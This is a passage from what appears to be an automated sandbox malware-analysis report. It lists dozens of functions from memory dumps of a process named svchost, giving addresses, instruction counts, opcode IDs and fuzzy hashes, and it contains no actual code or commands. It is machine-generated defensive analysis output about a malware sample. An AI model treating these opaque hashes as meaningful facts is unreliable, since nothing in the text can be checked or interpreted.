                                          • Instruction Fuzzy Hash: 73F06D75A00358EFCB04EFA9D905AAEB7F4FF18300F44406AA915EB381EA349A00CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A4C577 Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 49e0f62fbadc8cdb115242f1f4da8f4483f8c8d609ac88bfb68ba05bee932166
                                          • Instruction ID: 5306c892fffc13b9641f29fc2078d99383edecf65f3f4d4c64f6c739525ebeac
                                          • Opcode Fuzzy Hash: 49e0f62fbadc8cdb115242f1f4da8f4483f8c8d609ac88bfb68ba05bee932166
                                          • Instruction Fuzzy Hash: FEF0B4B2997790BFD735C754C104B29BBE89B85771F4C84AFD40D87242D6A4D880C253
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A6927A Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction ID: a503ecf413ade13eb069221c91357ceeee59484fd35cc5f922003c34e583fb21
                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction Fuzzy Hash: 17E0ED322406006BE761EE1ADC80B13B6A9AF82B20F04407EB9001E282CAF6D80887A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AE2073 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6f26226194722a5da40e22f6c03710ef9f8e7b9206b1d12d2ad48b4c48c007de
                                          • Instruction ID: e46e73a5a70f4632a80c05e4e63371638071582ca44b1940de5f717490b2c7ce
                                          • Opcode Fuzzy Hash: 6f26226194722a5da40e22f6c03710ef9f8e7b9206b1d12d2ad48b4c48c007de
                                          • Instruction Fuzzy Hash: 85F0A76B4152A44FDE32FB2462513D17B9DE785219B8D088BD4919B64CC9348C83DA54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF8D34 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a857abfd4208d2027f059c580c50fd6c8c2b5238e1ce4bef0e0893f1aa30b06a
                                          • Instruction ID: 20f8b76f8723ceafba29c1fa3a984042af2d33645d1b6cb9128a51932b1f4872
                                          • Opcode Fuzzy Hash: a857abfd4208d2027f059c580c50fd6c8c2b5238e1ce4bef0e0893f1aa30b06a
                                          • Instruction Fuzzy Hash: C6F0B474A047089FCB04EFB8D541A6EB7B8EF14300F50809AF905EB380EA38D900CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF8B58 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 787f08f652a97152bd01598f30e271ea2733aa296c8d1f6ed99f3084f2d1f962
                                          • Instruction ID: 757d6bc2d9017957c6a563cd3cb9eb89aa138bcf17c4a2b9f7687a992817273d
                                          • Opcode Fuzzy Hash: 787f08f652a97152bd01598f30e271ea2733aa296c8d1f6ed99f3084f2d1f962
                                          • Instruction Fuzzy Hash: E7F082B4A14258AFDB00EBA8DA06E7EB3B8EF04300F44045ABA15DF3C0EB34D900C794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A24F2E Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a7483e55f74211a6a06a261110afbadd7c8da3d25a24ffdd5e1367984e790d2
                                          • Instruction ID: e44342955dde14d4a05c71ebfceade0117a601ad18fb68875f0cf455b7474574
                                          • Opcode Fuzzy Hash: 6a7483e55f74211a6a06a261110afbadd7c8da3d25a24ffdd5e1367984e790d2
                                          • Instruction Fuzzy Hash: 1AF0E236522794AFD771E71CC248B23B7ECAB047BCF0844BBD4058BA20C724EC48C680
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AF8CD6 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cdcb18fb0f63d50e2acc458929effcbab7ca54938da6601168885522a9eec9b7
                                          • Instruction ID: ebf7465a985371e8ae83d4974284ab655a5cf31d3d06674aa0ef8716eee4105e
                                          • Opcode Fuzzy Hash: cdcb18fb0f63d50e2acc458929effcbab7ca54938da6601168885522a9eec9b7
                                          • Instruction Fuzzy Hash: 33F089759046489FDB04DBA9D945D6E77B8EF54200F54015AF515EB3C0EA34D900C754
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A4746D Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b7217910af3fa6bd97f55fbc78a0ed8f74566b527d00c183a4c26c24a9daa1f1
                                          • Instruction ID: fe8da005253560fe336f2bec2e138c0af006b060dbfe76d539f3219c30d173d2
                                          • Opcode Fuzzy Hash: b7217910af3fa6bd97f55fbc78a0ed8f74566b527d00c183a4c26c24a9daa1f1
                                          • Instruction Fuzzy Hash: 40F0E9389002C5AECF11DB68E540F79BB71AF94354F48056BD8F1AB260E736D801C785
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5A44B Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e433862218b1492e8583b81f0d7113e26af4d68772e23eb1ba5e8f8b7cbab35f
                                          • Instruction ID: ea70306727462e7ca7e9f388d9852c21267073109dc09fcff2babaf835c1c740
                                          • Opcode Fuzzy Hash: e433862218b1492e8583b81f0d7113e26af4d68772e23eb1ba5e8f8b7cbab35f
                                          • Instruction Fuzzy Hash: D4E092B2B01421AFD2129B58BC00F67B3ADEBE4A51F09813AF904CB214DA38DD01C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2F358 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction ID: a39fc28f0c6c737c4e2487f282fe8aec8276c93564ef62c44f6ed47cc80f25ba
                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction Fuzzy Hash: FEE0D836A41228FFDB21E7DD9E05F5AFFBCDB48A60F040156B904DB150D5749D00C2D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A3FF60 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0635323b749ad37ffdb5e57dfe2aa7c78b5aa37d7ada713f97127d20311f7544
                                          • Instruction ID: 09797ad1da43d776ce555177c3adf2c06d8d7e6832c2568fee2e9181f8262581
                                          • Opcode Fuzzy Hash: 0635323b749ad37ffdb5e57dfe2aa7c78b5aa37d7ada713f97127d20311f7544
                                          • Instruction Fuzzy Hash: FEE0DFB4A253049FD734DB51D140F2677AC9B83721F1D809FF80A4B201C621D880C356
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03ADD380 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction ID: d04410e0e8af115e064c8a4bde9753eafc2b60d7f56d9ba18273a8c17dcd220c
                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction Fuzzy Hash: D2E0C235280354BBDB229F44CD00F697B2AEF407A0F104036FE099EB90C7719C91D6C4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AB41E8 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1e45bdf62e3ab4f10a3b2d15bae69a11121e62fd14261b5459c4dbf1aff0620
                                          • Instruction ID: 3611f27491d087d3734b7d9218bb0280e4499696eff2314fd9bc1f410678bb3f
                                          • Opcode Fuzzy Hash: c1e45bdf62e3ab4f10a3b2d15bae69a11121e62fd14261b5459c4dbf1aff0620
                                          • Instruction Fuzzy Hash: 4FF0157A911724DECBA0FFA9974075836B8FB48319F9041BB9150CBA8AC7344481DF02
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5A185 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 86e72a16b7775da728586cbdb87428a532fce82b36c89db11840337fc27918ad
                                          • Instruction ID: 3f28ca659229554ca3ade57c2c3b003c4b3e256e1b5bfead3fa3d09fbb563005
                                          • Opcode Fuzzy Hash: 86e72a16b7775da728586cbdb87428a532fce82b36c89db11840337fc27918ad
                                          • Instruction Fuzzy Hash: 48D02E63A210081EC72EE3298E14B216316F7C4708FB049AFFE070FAA0DBB088E0D109
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407B1B Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0399dbf81a8e179304ea66963a8fe7e0c029b2b9201793e9c0ca1e1a70a1535f
                                          • Instruction ID: bce80607c34a0607690d3087a627c58cfc7a13e418d33227c23787c380f5d4b9
                                          • Opcode Fuzzy Hash: 0399dbf81a8e179304ea66963a8fe7e0c029b2b9201793e9c0ca1e1a70a1535f
                                          • Instruction Fuzzy Hash: B7C08C32A8E51409E6288C8D7C493B4FB14C7D3036E3023EBEC05A36841C83C4A300CE
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A516E0 Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec4ca2e90d9c1f4f0cfe72b136d924b454545a15cd3c2f0b07548bf4b3ccbf67
                                          • Instruction ID: 267722a3a41cd6698f86947427ef54bc09283f8faac860ade222f02fe4f6d43d
                                          • Opcode Fuzzy Hash: ec4ca2e90d9c1f4f0cfe72b136d924b454545a15cd3c2f0b07548bf4b3ccbf67
                                          • Instruction Fuzzy Hash: 5DD0A73214120052DE2DDB159904B246251EBC0785F3C046EF9074D9C0CFB8CCA2E488
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA53CA Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction ID: d13d3336b012cb9ef761c3ae1a85183ca2db7ca84dd89aa7704a053349bbbfd9
                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction Fuzzy Hash: 6EE04636A00B809BCB12DB89C660F4AB7F5BB86B00F180409A4085F620C724A800CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A3AAB0 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction ID: ffaad15ff88afce84f4b69d28108e970429837cdd7bc4d8e0f21afdc89172e54
                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction Fuzzy Hash: 79D0C935352980CFD716CB0CC554B0573A8FB04B40FC904D5E400CB721E62CD940CA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A535A1 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction ID: d2afec10ecef7dd15cbff9693c873a325f0841d8f573ce6bf2663dc3994f2b77
                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                          • Instruction Fuzzy Hash: 1FD0C73D5511849DDF53EF50C2347687775BF41294F5C305BB847455D1C3354959D601
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2DB40 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction ID: 54fb4ad300d13d00bbbce19418631123d4d145c0c1d78a2b5d14f84adf550422
                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                          • Instruction Fuzzy Hash: 61C08C30280B00AAEB22AF20CE01B00BAA0BB40B01F4804A1B300DA0F0DB7CD801E600
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AAA537 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction ID: c130f9e21c8b3e47fe33f92bebad240e4b6b1819cece2a0790a8c9bd1e63b41b
                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                          • Instruction Fuzzy Hash: 85C01236080248BBCB12AE81DD01F067B2AEB94B60F008011BA080A660863AE970EA84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A43A1C Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction ID: 18221bf582f270b020baa11ef64e5819d87cc3766b7749a8cdd571017711b718
                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                          • Instruction Fuzzy Hash: 5AC04C36180648BBC712AE46DD01F15BB69E794B60F154021B6040A6618576ED61D598
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A376E2 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction ID: c7f5b9fc8f64f9c3c2b6aa5085f7816004fe1f620a02788f4c3df77c4a21bc80
                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                          • Instruction Fuzzy Hash: CFC08CB41812C05AEB2AD708CF30B203654AB0A708F8C099EBA012D5A2C36EA802C208
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A536CC Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction ID: 623afee40d635577f5a2bb9c56557211e8998bc9acb7f5e6c7a0c33217540487
                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                          • Instruction Fuzzy Hash: B4C09B79155540BBDB15AF30CE51F16F254FB84A61F6C075D7221499F0D57D9C00E504
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2AD30 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction ID: 2d87810ed208d50aebef0af369c9a0d2ed58bcc4787f288e431fd5369e949348
                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                          • Instruction Fuzzy Hash: 81C08C32080288BBC712AA45CE00F017B29E790B60F000021F6040A6618A32E860D588
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A47D50 Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction ID: 659ac9651a4e450b91f78008700e8549a0c43bd29376076aeb6b28179654b1ac
                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                          • Instruction Fuzzy Hash: CAB092343119808FCE16DF28C080B1533E8BB84A40B8800D4E400CBA20D32AE8008900
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A52ACB Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction ID: f5b041d81d0815a4ff59af28ae87ae8cc498d738809d15fea3667d849626c4b9
                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                          • Instruction Fuzzy Hash: 98B092329115408BCF02EF40C610B197331AB00750F058491A0012BA208228AC01CA40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A6A3B0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 952db30414a465e9c2fe8cb732acb36e06702887da40fe7f481e4af55b5a2456
                                          • Instruction ID: 0d648ac4c3d87eb090f6f58904cced62ea88313ef48e2b522cdd60fd00928fdd
                                          • Opcode Fuzzy Hash: 952db30414a465e9c2fe8cb732acb36e06702887da40fe7f481e4af55b5a2456
                                          • Instruction Fuzzy Hash: D790027120148402E140B169888860B6005ABE0341F51C412E0416554C87558856A271
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69B00 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 382022496d68a5fdd3932f3d274ff74ea67dc519c04084874e2536fd54d3e62b
                                          • Instruction ID: f82582a16c41a73a6c4316dfc86fb431b6cb2d9cfe69a244a451d83c14494d53
                                          • Opcode Fuzzy Hash: 382022496d68a5fdd3932f3d274ff74ea67dc519c04084874e2536fd54d3e62b
                                          • Instruction Fuzzy Hash: 0D90026124104C02E140B16988587071006DBD0641F51C012A0015554D8756896576F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69A80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6382e426fdec7679b58c5e7c2ecbc4c75993f5598c74c6469f97b9fa75b592c3
                                          • Instruction ID: bb067a0e14a55ba6bae48ceabcf6d59073d20bfb2cb0f23687b4e91f76d7e2c8
                                          • Opcode Fuzzy Hash: 6382e426fdec7679b58c5e7c2ecbc4c75993f5598c74c6469f97b9fa75b592c3
                                          • Instruction Fuzzy Hash: 4D90026120148842E140A2694C48B0F51059BE1242F91C01AA4147554CCA5588556771
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69A10 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 43aa05bd3ef7f2ad6e2fd2ad25f5054e32af158d3a416536a9f462b09a6c5bd8
                                          • Instruction ID: cc83a84138207609e0b569b2260eff62e63b98070de68cd9d5f5eaa34d82be59
                                          • Opcode Fuzzy Hash: 43aa05bd3ef7f2ad6e2fd2ad25f5054e32af158d3a416536a9f462b09a6c5bd8
                                          • Instruction Fuzzy Hash: 1490027120144802E100A1694C4C74710059BD0342F51C012A5155555E87A5C8917571
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A699D0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
